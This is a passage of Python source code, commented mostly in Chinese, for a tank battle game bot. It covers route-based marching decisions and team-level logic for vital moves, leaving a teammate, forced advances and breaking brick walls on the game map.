(Action.is_move(oppPlayer.get_previous_action(back=1)) and battler.get_manhattan_distance_to(oppBattler) == 2 ): # 这种情况对应着对方刚刚到达拐角处,这种情况是有危险性的,因此再停留一回合 5cd4045c86d50d05a00840e1 pass elif oppBattler.canShoot: # 当回合可以射击,并且我上回合停留,因此敌人上回合可以射击 # 说明敌人大概率不打算攻击我 player.set_status(Status.ACTIVE_DEFENSIVE) return attackAction player.set_status(Status.PREVENT_BEING_KILLED) # 否则标记为防止被杀,用于上面的触发 player.set_status(Status.ACTIVE_DEFENSIVE) return realAction #{ END 'decision/single/active_defense.py' }# #{ BEGIN 'decision/single/marching.py' }# class MarchingDecision(SingleDecisionMaker): """ 行军策略 ------------------------- 当身边没有和任何敌人正面遭遇的时候,尝试寻找最佳的进攻行为 1. 进攻 2. 不会主动破墙 3. 遇到僵局,会在指定回合后自动打破僵局 4. 遇到有风险的路径导致需要停止不前的,会考虑寻找相同长度但是安全的路径,并改变方向 5. ...... 
""" def _make_decision(self): player = self._player signal = self._signal map_ = player._map tank = player.tank battler = player.battler teammate = player.teammate Tank2Player = type(player) BattleTank = type(battler) # (inserted) 强攻信号 #------------------------- if signal == Signal.FORCED_MARCH: attackAction = battler.get_next_attacking_action() # 应该是移动行为,且不需检查安全性 player.set_status(Status.READY_TO_FORCED_MARCH) return ( attackAction, Signal.READY_TO_FORCED_MARCH ) oppTank = battler.get_nearest_enemy() oppBattler = BattleTank(oppTank) oppPlayer = Tank2Player(oppBattler) myRoute = battler.get_shortest_attacking_route() oppRoute = oppBattler.get_shortest_attacking_route() # assert not myRoute.is_not_found() and not oppRoute.is_not_found(), "route not found" # 一定能找到路 if myRoute.is_not_found() or oppRoute.is_not_found(): # 可能出现这种队友堵住去路的及其特殊的情况! 5cdde41fd2337e01c79f1284 allowedDelay = 0 else: leadingLength = oppRoute.length - myRoute.length if leadingLength <= 0: allowedDelay = 0 # 不必别人领先的情况下,就不要 delay 了 ... else: allowedDelay = leadingLength # 允许和对手同时到达,但由于我方先手,实际上应该是领先的 # # 在我方地盘时,优先从边路攻击 # 到达敌方场地,优先从中路攻击 # # 5cde18e7d2337e01c79f47c8 # isMiddleFirst = False # isMiddleFirst = battler.is_in_enemy_site() # # TODO: # 不要采用中路优先的搜索,否则容易打出狭路,然后因为敌人对自己存在威胁而停止不前! 
# 5ce48c2fd2337e01c7a6459b isXAxisFirst = False # # 如果我方两架坦克都到达了敌方基地,处于双方均不回头的局面 5cec9157641dd10fdcc5f30d # 那么可以采用 x-axis-first 以更好地触发团队合作,因为它优先选择拆除 x = 4 的墙 # _allPlayers = [ player, teammate, *player.opponents ] if (all( _player.battler.is_in_enemy_site(include_midline=True) for _player in _allPlayers ) and all( not _player.battler.has_enemy_around() for _player in _allPlayers ) ): # 如果双方都处在对方基地,并且都没有遭遇到敌人 isMiddleFirst = True # 想要使用 x-axis-first 必须首先 middle-first isXAxisFirst = True if battler.is_in_our_site(): # # 在我方基地的时候,不要评估敌人对攻击路线的干扰,而是优先采用边路优先的搜索。这样可能和敌人相撞, # 但至少可以平局。如果在我方基地就开始衡量敌人的干扰,那么敌人绕边路的时候我方可能会选择中路, # 这种情况下可能会被另一边的敌人干扰,出现一牵二的局面。 # # 还可能遇到一种很糟糕的情况,就是我方为了绕开敌人而选择了一条比最短路线要长的路,这种情况下 # 可能我方最终就会落后与对方,这样如果还绕过了敌人,那就根本没法拦截了,到最后肯定是输。 # # TODO: # ---------------------- # 这个影响对于bot的侵略性影响非常大,因为很容易因此和对方平局。并且边路分拆难以触发合作拆家, # 进攻优势会被削弱。也许可以一牵二的情况进行特判,其他情况继续绕路? # 也许需要根据情况进行判定,毕竟一牵二的情况和绕路拆家结果反而赢了的情况是有的,而且似乎都不少见 # routes = battler.get_all_shortest_attacking_routes(delay=allowedDelay, middle_first=isMiddleFirst, x_axis_first=isXAxisFirst) else: routes = sorted( battler.get_all_shortest_attacking_routes(delay=allowedDelay, middle_first=isMiddleFirst, x_axis_first=isXAxisFirst), key=lambda r: estimate_enemy_effect_on_route(r, player) ) route = None # 这回合的进攻路线 returnAction = Action.STAY # 将会返回的行为,默认为 STAY # # 对于最优方案的缓存,用于判断次优行为是否合理 # 没事老回头实在是太蠢了! 5cee6790641dd10fdcc8de2c # 有路也不是这样走啊! 
# _firstAttackAction = None # 第一条路线给出的进攻行为 _firstRealAction = None # 第一条路线下玩家真实决策的而行为 _firstPreventBeingKilled = False # 第一个进攻行为是否因为受到敌人拦截而受阻 _firstStatus = None # 缓存第一次决策时的状态 _isFirstRoute = False # 当前是否为第一条路径 _firstRoute = None # 缓存第一条路径 with outer_label() as OUTER_BREAK: # # TODO: # 仅仅在此处综合考虑路线长度和敌人的影响,有必要统一让所有尝试获得下一步行为的函数都 # 以于此处相同的方式获得下一攻击行为 # # for route in battler.get_all_shortest_attacking_routes(): # 目的是找到一个不是停留的动作,避免浪费时间 # for route in sorted_routes_by_enemy_effect( # battler.get_all_shortest_attacking_routes(delay=allowedDelay), player ): # for route in sorted( battler.get_all_shortest_attacking_routes(delay=allowedDelay, middle_first=isMiddleFirst, x_axis_first=isXAxisFirst), # key=lambda r: estimate_enemy_effect_on_route(r, player) ): _cachedAttackActions = set() # 缓存已经考虑过的结果 for _idx, route in enumerate(routes): # 引入 idx 用于判断是第几个路线 # 首先清除可能出现的状态,也就是导致 stay 的状况 ????? _isFirstRoute = ( _idx == 0 ) if _idx == 1: # 恰好过了第二回合 _firstStatus = player.get_status().copy() # 确保所有 continue 语句设置的 status 都可以在这里被捕获 player.remove_status(Status.WAIT_FOR_MARCHING, Status.PREVENT_BEING_KILLED, Status.HAS_ENEMY_BEHIND_BRICK) attackAction = battler.get_next_attacking_action(route) if _isFirstRoute: # 缓存行为和路线 _firstAttackAction = attackAction _firstRoute = route if attackAction in _cachedAttackActions: # 缓存攻击行为,避免重复判断 continue _cachedAttackActions.add(attackAction) if Action.is_stay(attackAction): # 下一步是停留,就没必要过多判断了 returnAction = attackAction raise OUTER_BREAK realAction = player.try_make_decision(attackAction) if _isFirstRoute: # 缓存真实判断 _firstRealAction = realAction # debug_print(player, attackAction, realAction) if Action.is_stay(realAction): # 存在风险 if Action.is_move(attackAction): # 特殊情况,如果下下回合就要打掉对方基地 # 那就没必要乱跑了 5cddde4dd2337e01c79f0ba3 # if battler.is_face_to_enemy_base(): returnAction = realAction raise OUTER_BREAK # (inserted) 主动打破僵局:因为遇到敌人,为了防止被射杀而停留 # 注: # 在上方的主动防御模式里还有一段和这里逻辑基本一致的代码 #-------------------------- if 
(player.has_status_in_previous_turns(Status.WAIT_FOR_MARCHING, turns=1) and player.has_status_in_previous_turns(Status.PREVENT_BEING_KILLED, turns=1) ): # 即将停留第二回合 riskyBattler = player.get_risky_enemy() riskyPlayer = Tank2Player(riskyBattler) # # 判断敌人不会攻击我的标准 # # 1. 敌人当前回合可以射击 # 2。 敌人上回合也可以射击 # 3. 敌人上回合与上上回合的行为相同,也就是已经连续移动了两个回合或者等待了两个回合 # 这个补充条件非常重要 5cde71a4d2337e01c79f9a77 # # TODO: # 这个条件仍然不对!! 5ce220add2337e01c7a38462 # if (riskyBattler.canShoot # 当回合可以射击 and not riskyPlayer.has_status_in_previous_turns(Status.RELOADING) # 上回合也可以射击 and riskyPlayer.get_previous_action(back=1) == riskyPlayer.get_previous_action(back=2) ): # 说明敌人大概率不打算攻击我 if (Action.is_move(riskyPlayer.get_previous_action(back=1)) and battler.get_manhattan_distance_to(riskyBattler) == 2 ): # 这种情况对应着对方刚刚到达拐角处,这种情况是有危险性的,因此再停留一回合 5cd4045c86d50d05a00840e1 player.set_status(Status.WAIT_FOR_MARCHING) player.set_status(Status.PREVENT_BEING_KILLED) pass else: # TODO: # 此处需要检查是否应该预先破墙 5ce21ba2d2337e01c7a37dbd # player.set_status(Status.KEEP_ON_MARCHING) returnAction = attackAction raise OUTER_BREAK # 原本的移动,现在变为停留 #------------------------ # 停着就是在浪费时间,不如选择进攻 # fields = battler.get_destroyed_fields_if_shoot(attackAction) # # 如果当前回合射击可以摧毁的对象中,包含自己最短路线上的块 # 那么就射击 # for field in fields: if route.has_block(field): # 为 block 对象,该回合可以射击 action = player.try_make_decision(battler.shoot_to(field)) if Action.is_shoot(action): # 这个信号是他现在的真实体现,可以用来触发团队破墙信号 player.set_status(Status.WAIT_FOR_MARCHING) player.set_status(Status.PREVENT_BEING_KILLED) returnAction = action raise OUTER_BREAK # # 如果能摧毁的是基地外墙,仍然选择攻击 # 因为在攻击后可能可以给出更加短的路线 # for field in fields: if battler.check_is_outer_wall_of_enemy_base(field): action = player.try_make_decision(battler.shoot_to(field)) if Action.is_shoot(action): # 这个信号是他现在的真实体现,可以用来触发团队破墙信号 player.set_status(Status.WAIT_FOR_MARCHING) player.set_status(Status.PREVENT_BEING_KILLED) returnAction = action raise OUTER_BREAK # # 如果不能摧毁和地方基地周围的墙,但是可以摧毁与自己中间相差一格的墙,那么仍然选择攻击 # 
这种情况多半属于,如果当前回合往前走一步,可能被垂直方向的敌人射杀,因为不敢前进 # 在多回合后,我方可能会主动突破这种僵持情况。在我方主动向前一步的时候,敌人将可以 # 射击我方坦克。如果前方有一个空位,那么我方坦克就可以闪避到前方的空位上,从而继续前进。 # 如果这个位置本来是个砖块,但是没有预先摧毁,我方坦克在突击后就只能选择原路闪回, # 那么就可能出现僵局 # 因此这里预先摧毁和自己相差一格的土墙,方便后续突击 # # 如果是防御状态,那么不要随便打破墙壁! 5cd31d84a51e681f0e91ca2c # if (not player.has_status(Status.DEFENSIVE) # 防御性无效 and battler.is_in_enemy_site() # 只有在对方基地的时候才有效 ): for field in fields: if (isinstance(field, BrickField) and battler.get_manhattan_distance_to(field) == 2 # 距离为 2 相当于土墙 and battler.canShoot ): # 这个信号是他现在的真实体现,可以用来触发团队破墙信号 player.set_status(Status.WAIT_FOR_MARCHING) player.set_status(Status.PREVENT_BEING_KILLED) player.set_status(Status.READY_TO_CLEAR_A_ROAD_FIRST) returnAction = battler.shoot_to(field) raise OUTER_BREAK elif Action.is_shoot(attackAction): # 如果为射击行为,检查是否是墙后敌人造成的 enemy = battler.get_enemy_behind_brick(attackAction, interval=-1) if enemy is not None: player.set_risky_enemy(enemy) # 额外指定一下,确保是这个敌人造成的 player.set_status(Status.HAS_ENEMY_BEHIND_BRICK) # # 强攻行为,如果出现这种情况,双方均在拆家,但是对方坦克下一步有可能移到我方坦克后方 # 对于这种情况,大部分人应该选择继续进攻,同时绕开麻烦,因为进攻的时候还考虑击杀敌人 # 一般会延误战机。这种情况下应该判定为敌方坦克不会来尝试击杀我方坦克,那么就继续攻击 # 5ce57074d2337e01c7a7b128 # oppBattler = player.get_risky_enemy() if (battler.is_in_enemy_site() # 双方均在对方基地方时才触发 and oppBattler.is_in_enemy_site() ): # # 现在尝试看对方是否能够找到一条不受到我方坦克影响的最短攻击路线 # 通常应该是可以找到的 # _consideredActions = set() # 缓存已经考虑过的行为 for route in oppBattler.get_all_shortest_attacking_routes(): _action = oppBattler.get_next_attacking_action() if _action in _consideredActions: continue _consideredActions.add(_action) with map_.simulate_one_action(oppBattler, _action): if not battler.has_enemy_around(): # 说明找到了一条可以躲开我方坦克的路线 player.set_status(Status.KEEP_ON_MARCHING) returnAction = attackAction raise OUTER_BREAK # # 否则停止不前 # 此时必定有 riskyEnemy # player.set_status(Status.WAIT_FOR_MARCHING) # 可能触发 Signal.PREPARE_FOR_BREAK_BRICK 和 Signal.FORCED_MARCH player.set_status(Status.PREVENT_BEING_KILLED) # TODO: 这个状态是普适性的,希望在上面的各种情况中都能补全 if _isFirstRoute: 
_firstPreventBeingKilled = True # 缓存状态,仅仅在因为防止被杀而停留的状态下缓存,其他情况不算 _firstStatus = player.get_status().copy() # 结束时常规地要复制一次,避免没有第二条路的情况 returnAction = Action.STAY continue # 停留动作,尝试继续寻找 # 对于移动行为,有可能处于闪避到远路又回来的僵局中 5cd009e0a51e681f0e8f3ffb # 因此在这里根据前期状态尝试打破僵局 #---------------------------------- if (player.has_status_in_previous_turns(Status.WILL_DODGE_TO_LONG_WAY, turns=1) # 说明上回合刚闪避回来 and Action.is_move(realAction) # 然后这回合又准备回去 ): # TODO: # 此处是否有必要进一步检查两次遇到的敌人为同一人? # # # 首先考虑前方相距一格处是否有土墙,如果有,那么就凿墙 5cd009e0a51e681f0e8f3ffb # if battler.will_destroy_a_brick_if_shoot(realAction): field = battler.get_destroyed_fields_if_shoot(realAction)[0] if (not battler.is_in_our_site(field) # 这个 brick 必须不在我方基地! and battler.get_manhattan_distance_to(field) == 2 and battler.canShoot ): player.set_status(Status.KEEP_ON_MARCHING) # 真实体现 returnAction = battler.shoot_to(field) raise OUTER_BREAK #player.add_label(Label.ALWAYS_DODGE_TO_LONG_WAY) # 如果能够运行到这里,就添加这个标记 # 预判一步,如果下一步会遇到敌人,并且不得不回头闪避的话,就考虑先摧毁与自己中间相差一格的墙(如果存在) # 类似于主动防御的情况 # if Action.is_move(realAction): if battler.is_face_to_enemy_base(ignore_brick=True): # 如果已经和基地处在同一直线上 with map_.simulate_one_action(battler, realAction): if not battler.is_face_to_enemy_base(ignore_brick=True): returnAction = Action.STAY # 如果移动后不再面对敌人基地,那么就不移动 raise OUTER_BREAK if (not player.has_status(Status.DEFENSIVE) # 防御性无效 and battler.is_in_enemy_site() # 只有在敌方地盘时才有效! 
and battler.will_destroy_a_brick_if_shoot(realAction) # 如果下回合能射掉一个墙 ): _needToBreakWallFirst = True with map_.simulate_one_action(battler, realAction): enemies = battler.get_enemies_around() if len(enemies) == 0: # 没有敌人根本不需要预判 _needToBreakWallFirst = False else: with outer_label() as OUTER_BREAK_2: route1 = battler.get_shortest_attacking_route() for enemy in battler.get_enemies_around(): for action in battler.try_dodge(enemy): with map_.simulate_one_action(battler, action): route2 = battler.get_shortest_attacking_route() # 只有 route1 为 delay = 0 的选择才可比较 if route2.length <= route1.length: # 如果存在着一种闪避方法使得闪避后线路长度可以不超过原线路长度 _needToBreakWallFirst = False # 那么就不破墙 raise OUTER_BREAK_2 if _needToBreakWallFirst: # 现在尝试破墙 shootAction = realAction + 4 for field in battler.get_destroyed_fields_if_shoot(shootAction): if isinstance(field, BrickField): if battler.get_manhattan_distance_to(field) == 2: # 距离为 2 的土墙 if battler.canShoot: player.set_status(Status.WAIT_FOR_MARCHING) player.set_status(Status.READY_TO_CLEAR_A_ROAD_FIRST) returnAction = shootAction # 不检查安全性 raise OUTER_BREAK if (_needToBreakWallFirst and not battler.canShoot # 需要射击但是暂时没有炮弹,那么就等待 ): player.set_status(Status.WAIT_FOR_MARCHING) returnAction = Action.STAY continue # # 考虑这样一种情况,如果下回合我可以射击且对方可以射击,我们中间差两个墙,如果我方不射击 # 对方可能就会压制过来,这样就很亏,所以当双方都有炮且两者间差一个墙的时候,我方优先射击 # 5cea974dd2337e01c7add31f # if (( player.has_status(Status.AGGRESSIVE) or player.has_status(Status.STALEMENT) ) and Action.is_move(realAction) and battler.canShoot ): shootAction = realAction + 4 _hasEnemyBehindTwoBricks = False oppBattler = None destroyedFields = battler.get_destroyed_fields_if_shoot(shootAction) if (len(destroyedFields) == 1 and isinstance(destroyedFields[0], BrickField) # 前方是墙 and battler.get_enemy_behind_brick(shootAction, interval=-1) is None # 现在墙后无人 ): with map_.simulate_one_action(battler, shootAction): destroyedFields = battler.get_destroyed_fields_if_shoot(shootAction) if len(destroyedFields) == 1 and 
isinstance(destroyedFields[0], BrickField): # 现在前面还有墙 enemy = battler.get_enemy_behind_brick(shootAction, interval=-1) if enemy is not None: # 此时墙后有人 _hasEnemyBehindTwoBricks = True oppBattler = BattleTank(enemy) if _hasEnemyBehindTwoBricks: if oppBattler.canShoot: # 此时对方也可以射击 player.set_status(Status.KEEP_ON_MARCHING) returnAction = shootAction # 那么我方这回合优先开炮,避免随后和对方进入僵持阶段 raise OUTER_BREAK # # move action 在这之前必须要全部处理完! # # # 侵略模式下优先射击,如果能够打掉处在最短路线上的墙壁 #------------------- if (player.has_status(Status.AGGRESSIVE) and Action.is_move(realAction) and battler.canShoot ): shootAction = realAction + 4 for field in battler.get_destroyed_fields_if_shoot(shootAction): if isinstance(field, BrickField) and field.xy in route: # 能够打掉一个处于最短路线上的土墙 action = player.try_make_decision(shootAction) if Action.is_shoot(action): player.set_status(Status.KEEP_ON_MARCHING) realAction = shootAction # 注意:这里修改了 realAction 方便后续判断,但是这是非常不好的一个做法 break # # 禁止随便破墙!容易导致自己陷入被动! # if Action.is_shoot(realAction): # # 敌人处在墙后的水平路线上,并且与墙的间隔不超过 1 个空格 5cd33a06a51e681f0e91de95 # 事实上 1 个空格是不够的! 5cd35e08a51e681f0e92182e # _shouldStay = False oppBattler = None enemy = battler.get_enemy_behind_brick(realAction, interval=-1) if enemy is not None: # 墙后有人,不能射击 # 否则就等待 #--------------- player.set_risky_enemy(enemy) # 设置这个敌人! 
player.set_status(Status.HAS_ENEMY_BEHIND_BRICK) player.set_status(Status.WAIT_FOR_MARCHING) _shouldStay = True # # 敌人下一步可能移到墙后面 # if not _shouldStay: with outer_label() as OUTER_BREAK_2: for oppBattler in [ _oppPlayer.battler for _oppPlayer in player.opponents ]: if oppBattler.destroyed: continue for moveAction in oppBattler.get_all_valid_move_actions(): with map_.simulate_one_action(oppBattler, moveAction): enemy = battler.get_enemy_behind_brick(realAction, interval=-1) if enemy is not None: # 此时如果直接出现在墙的后面 player.set_status(Status.WAIT_FOR_MARCHING) player.set_status(Status.ENEMY_MAY_APPEAR_BEHIND_BRICK) player.set_risky_enemy(enemy) # 仍然将其设置为墙后敌人 _shouldStay = True raise OUTER_BREAK_2 # # 并不是一定不能破墙,需要检查敌人是否真的有威胁 # # 1. 和队友相遇的敌人可以忽略 5ce209c1d2337e01c7a36a0a # 2. 和队友隔墙僵持的敌人可以忽略(这种情况非常有可能) 5ce5678ed2337e01c7a79ace # 3. 对手正在和队友僵持的敌人可以忽略 5ce70df6d2337e01c7a98926 # 4. 如果对手威胁我的位置他曾经到过,那么可以忽略 5ce266a1d2337e01c7a3cc90 # if _shouldStay and oppBattler is not None: teammateBattler = teammate.battler oppTank = oppBattler.tank # 考虑两人相对 for enemy in teammateBattler.get_enemies_around(): if enemy is oppTank: # 被队友牵制的敌人可以忽略 _shouldStay = False break # 考虑是否隔墙僵持 _action = teammateBattler.get_next_attacking_action() if not Action.is_stay(_action): enemy = teammateBattler.get_enemy_behind_brick(_action, interval=-1) if enemy is oppTank: # 和队友隔墙僵持的敌人可以忽略 _shouldStay = False # 考虑是否和队友僵持 if teammateBattler.get_manhattan_distance_to(oppBattler) == 2: _action = oppBattler.get_next_attacking_action() with map_.simulate_one_action(oppBattler, _action): # 模拟一步后和队友相遇 if teammateBattler.get_manhattan_distance_to(oppBattler) == 1: _shouldStay = False # # 如果敌人威胁我的位置它曾经到过(这种情况实际上包含了第三点) # # 先找到威胁我方坦克的位置 _enemyRiskySite = None # (x, y) with map_.simulate_one_action(battler, realAction): for _action in oppBattler.get_all_valid_move_actions(): with map_.simulate_one_action(oppBattler, _action): if battler.on_the_same_line_with(oppBattler): _enemyRiskySite = oppBattler.xy break #assert 
_enemyRiskySite is not None # 一定会找到? enemyAttackingRoute = oppBattler.get_shortest_attacking_route() # # 不在敌人的进攻路线上,这样才算是已经走过,否则可以认为他在晃墙? # 5cec129e4742030582fac36d # if not _enemyRiskySite in enemyAttackingRoute: with map_.auto_undo_revert() as counter: while map_.revert(): # 回滚成功则 True counter.increase() if oppBattler.xy == _enemyRiskySite: # 他曾经到过这个地方 _shouldStay = False break if (_shouldStay and player.has_status(Status.ENEMY_MAY_APPEAR_BEHIND_BRICK) ): # 不能在这种情况下破墙! 5cec129e4742030582fac36d returnAction = Action.STAY continue if _shouldStay: # 先尝试 shoot 转 move #--------------- if Action.is_shoot(realAction): moveAction = realAction - 4 action = player.try_make_decision(moveAction) if Action.is_move(action): returnAction = action break if _shouldStay: # 否则 stay returnAction = Action.STAY continue # # (inserted) 打破老是回头的僵局 # # 尝试向着两边闪避 5ced9540641dd10fdcc79752 # if (oppBattler is not None # 好吧 ... 不加这个可能过不了自动测试 -> TODO: 也许我们不应该再替对方决策一遍? and player.has_label(Label.ALWAYS_BACK_AWAY) and not battler.is_in_our_site(include_midline=True) # 限制为严格地不在我方基地 ): for action in battler.try_dodge(oppBattler): _realAction = player.try_make_decision(action) if not Action.is_stay(_realAction): # 可走的路线,那么直接闪避 player.set_status(Status.TRY_TO_BREAK_ALWAYS_BACK_AWAY) player.remove_labels(Label.ALWAYS_BACK_AWAY) # 那么就打破了这个状态 realAction = _realAction # 并将闪避方向作为这回合的攻击方向 break # 否则继续攻击 player.set_status(Status.KEEP_ON_MARCHING) returnAction = realAction raise OUTER_BREAK # endfor # endwith player.set_current_attacking_route(route) # 缓存攻击路线 # # 现在判断是否是第一条路线,并考虑它的合理性! # # 乱回头实在是太蠢了! 5cee6727641dd10fdcc8dd96 -> 5cee6e3d641dd10fdcc8e8cf # if (not _isFirstRoute # 选的是非第一条路线 and _firstPreventBeingKilled # 不选一条的原因是为了防止被杀 and Action.is_move(realAction) # 这条路线给出的行为是移动 and Action.is_move(_firstAttackAction) # 第一个进攻路线也是移动 and Action.is_opposite(realAction, _firstAttackAction) # 于是这条路线给出的移动方向是远离进攻路线的方向! ): # 这种情况下应该停下来! 
class IndividualTeamDecision(TeamDecisionMaker):
    """
    Each of the two players decides independently.

    This is the starting point of the team decision chain: every later
    team-level decision maker may only refine what is produced here.
    """

    def _make_decision(self):
        # Collect each player's individual decision in player order,
        # discarding the accompanying signal.
        actions = []
        for member in self._team.players:
            action, _ = member.make_decision()
            actions.append(action)
        return actions
#{ END 'decision/team/individual.py' }#



#{ BEGIN 'decision/team/vital.py' }#
class VitalTeamDecision(TeamDecisionMaker):
    """
    Promote vital individual decisions to team decisions.

    A vital individual decision is already team-optimal, so it is locked in
    as the team decision and lower-priority decision makers may not override it.
    """

    def _make_decision(self):
        team = self._team
        vital_statuses = (
            Status.SACRIFICE_FOR_OUR_BASE,   # about to sacrifice itself defending our base
            Status.BLOCK_ROAD_FOR_OUR_BASE,  # about to block a road defending our base
            Status.READY_TO_ATTACK_BASE,     # about to attack the enemy base
            Status.READY_TO_KILL_ENEMY,      # about to kill an enemy
        )
        for member in team.players:
            # TODO: the sacrificial-attack case may need to consider dodging
            #       5ccca535a51e681f0e8c7131
            if any(member.has_status(s) for s in vital_statuses):
                decision = member.get_current_decision()
                member.set_team_decision(decision)  # lock the individual decision in
        return [member.get_current_decision() for member in team.players]
""" def _make_decision(self): team = self._team player1, player2 = team.players returnActions = [ player.get_current_decision() for player in team.players ] if player1.defeated or player2.defeated: # 有队友已经挂了,那就不需要考虑这个情况了 return returnActions if player1.tank.xy == player2.tank.xy: if len([ action for action in returnActions if Action.is_move(action) ]) == 1: pass # 一人移动一人非移动,那么是合理的 elif ( all( Action.is_move(action) for action in returnActions ) and returnActions[0] != returnActions[1] ): # 两人均为移动,但是两人的移动方向不一样,这样也是可以的 pass elif all([ player.has_team_decision() for player in team.players ]): pass # 两者都拥有团队命令 else: # 两个队员可以认为是一样的,因此任意选择一个就好 if player1.has_team_decision(): player, idx = (player2, 1) else: player, idx = (player1, 0) with player.create_snapshot() as manager: action3, signal3 = player.make_decision(Signal.SHOULD_LEAVE_TEAMMATE) if signal3 == Signal.READY_TO_LEAVE_TEAMMATE: returnActions[idx] = action3 player.set_team_decision(action3) manager.discard_snapshot() # 保存更改 return returnActions #{ END 'decision/team/leave_teammate.py' }# #{ BEGIN 'decision/team/forced_attack.py' }# class ForcedAttackTeamDecision(TeamDecisionMaker): """ 强攻信号 ---------------- 为了解决单人决策行为过于保守的问题 在攻击过程中,一些所谓的有潜在危险的行为,实际上一点危险都没有,但是为了防止出错,就原地等待, 这反而是贻误了战机,甚至最后还要匆忙转攻为守,实际上根本就防不住 所以应该根据战场形势分析潜在风险究竟有多大,如果实际上是没有风险的,就发动强攻信号,让攻击者 保持进攻,而不去过分规避风险 如下情况是值得发动强攻信号的: 1. 侵略/僵持模式,出现了停止前进,防止被杀的状况 - 敌人正在和队友交火,敌人此回合可以射击,但是下回合必定会攻击队友 - 敌人正在和队友隔墙僵持,敌人可以射击,但是他并不攻击,多半是为了拖延战局 - 敌人正在和队友重叠,敌人可以射击,但是他一直在等待队友决策 2. 
侵略/僵持模式,出现了停止前进,两方均越过了中线,对方明显不会回头,不想防你 """ def _make_decision(self): team = self._team Tank2Player = type(team.players[0]) returnActions = [ player.get_current_decision() for player in team.players ] for player in team.players: action = player.get_current_decision() if player.has_team_decision() or player.defeated: continue if ( player.has_status(Status.AGGRESSIVE) # 侵略模式 or player.has_status(Status.STALEMENT) # 僵持模式 ): if (action == Action.STAY # 但是出现了停止前进 and player.has_status(Status.WAIT_FOR_MARCHING) # 等待行军 and player.has_status(Status.PREVENT_BEING_KILLED) # 是为了防止被杀 ): _shouldForcedMarch = False playerRiskyEnemyBattler = player.get_risky_enemy() if playerRiskyEnemyBattler is None: # 说明是因为没有弹药? continue oppPlayer = Tank2Player(playerRiskyEnemyBattler) teammate = player.teammate # 考虑队友和敌军的情况 #debug_print(player.get_risky_enemy()) #debug_print(teammate.get_risky_enemy()) # 敌人正在和队友交火 #------------------ # 这种情况直接前进 # if (oppPlayer.has_status(Status.ENCOUNT_ENEMY) and oppPlayer.has_status(Status.READY_TO_FIGHT_BACK) and oppPlayer.get_risky_enemy() is teammate.battler ): # 说明对方正准备和队友交火 _shouldForcedMarch = True # 敌人正在和队友隔墙僵持 #---------------------- # 如果他们僵持了超过一回合以上 # 保守起见,等待一回合,如果对方并未攻击我,说明它更关心和队友僵持,或者故意在拖时间 # # 那么可以直接进攻 # elif (oppPlayer.has_status(Status.HAS_ENEMY_BEHIND_BRICK) # 僵持超过一回合 and oppPlayer.has_status_in_previous_turns(Status.HAS_ENEMY_BEHIND_BRICK, turns=1) and oppPlayer.get_risky_enemy() is teammate.battler and player.has_status_in_previous_turns(Status.WAIT_FOR_MARCHING, turns=1) # 已经等待了一回合 and player.has_status_in_previous_turns(Status.PREVENT_BEING_KILLED, turns=1) ): _shouldForcedMarch = True # 敌人正在和队友重叠 #---------------------------- # 如果他们重叠不动超过一回合以上 # 保守起见,等待一回合,如果对方并未攻击我,说明它更关心和队友重叠 # # 那么可以直接进 # elif (oppPlayer.has_status(Status.OVERLAP_WITH_ENEMY) # 僵持超过一回合 and oppPlayer.has_status_in_previous_turns(Status.OVERLAP_WITH_ENEMY, turns=1) and player.has_status_in_previous_turns(Status.WAIT_FOR_MARCHING, turns=1) # 已经等待了一回合 and 
player.has_status_in_previous_turns(Status.PREVENT_BEING_KILLED, turns=1) ): _shouldForcedMarch = True # 双方均跨过中线 #----------------------------- # 那么不再反击,直接进攻? # # TODO: # 存在着一攻一守的 bot # if _shouldForcedMarch: # 建议强制行军 with player.create_snapshot() as manager: action3, signal3 = player.make_decision(Signal.FORCED_MARCH) if Signal.is_break(signal3): continue if signal3 == Signal.READY_TO_FORCED_MARCH: returnActions[player.id] = action3 player.set_team_decision(action3) player.set_status(Status.FORCED_MARCHING) manager.discard_snapshot() return returnActions #{ END 'decision/team/forced_attack.py' }# #{ BEGIN 'decision/team/break_brick.py' }# class BreakBrickTeamDecision(TeamDecisionMaker): """ 主动破墙的团队决策 ----------------- 乱破墙是不可以的,单人不要随便破墙,但是有条件的破墙是可以的 """ def _make_decision(self): team = self._team Tank2Player = type(team.players[0]) returnActions = [ player.get_current_decision() for player in team.players ] for player in team.players: action = player.get_current_decision() if player.has_team_decision() or player.defeated: continue if (Action.is_stay(action) # 当前回合处于等待状态 and player.has_status(Status.HAS_ENEMY_BEHIND_BRICK) # 墙后有人造成的 and player.has_status(Status.WAIT_FOR_MARCHING) # 因此等待行军 #and not player.has_status(Status.DEFENSIVE) # 不要让防御性的队友随意破墙 and not player.has_status(Status.RELOADING) # 目前有弹药 # and self.has_status_in_previous_turns(player, Status.WAIT_FOR_MARCHING, turns=1) # 改成一有机会就先留后路 ): # 触发的条件是一方隔墙,队友因为这两个人的僵持受到牵制 #---------------------------------------------------- # 僵持方先破墙,留好后路 #---------------------- with player.create_snapshot() as manager: action3, signal3 = player.make_decision(Signal.PREPARE_FOR_BREAK_BRICK) if Signal.is_break(signal3): continue if signal3 == Signal.READY_TO_PREPARE_FOR_BREAK_BRICK: # 下一步准备凿墙 returnActions[player.id] = action3 player.set_team_decision(action3) manager.discard_snapshot() continue # 至此该队员决策完成,等待它这回合凿墙 # elif signal3 == Signal.READY_TO_BREAK_BRICK: # 否则将受到破墙信号,开始判断是否符合破墙条件 elif signal3 == 
Signal.READY_TO_BREAK_BRICK: oppBattler = player.get_risky_enemy() # 获得墙后敌人 assert oppBattler is not None # 必定有风险敌人 oppPlayer = Tank2Player(oppBattler) # playerIdx = idx # teammateIdx = 1 - idx teammate = player.teammate _shouldBreakBrick = False if oppBattler.has_enemy_around(): # 发现敌人和队友相遇,立即破墙 _shouldBreakBrick = True ''' 这个两个触发已经不再需要了 5ce217e8d2337e01c7a3790c # TODO: # 这种情况挺难遇到的,而且一旦遇到一般都为时过晚 # 应该要模拟地图预测一下,提前开一炮 # if (teammate.has_status(Status.WAIT_FOR_MARCHING) # 队友等待 # and self.has_status_in_previous_turns(teammate, Status.WAIT_FOR_MARCHING, turns=1) and teammate.has_status(Status.PREVENT_BEING_KILLED) # 队友是为了防止被杀 ): teammateRiskyEnemyBattler = teammate.get_risky_enemy() playerRiskyEnemyBattler = player.get_risky_enemy() # 墙后敌人 if teammateRiskyEnemyBattler is playerRiskyEnemyBattler: # 两者受到同一个敌人牵制,那么发动破墙信号 _shouldBreakBrick = True elif ( teammate.has_status(Status.AGGRESSIVE) or teammate.has_status(Status.STALEMENT) ): 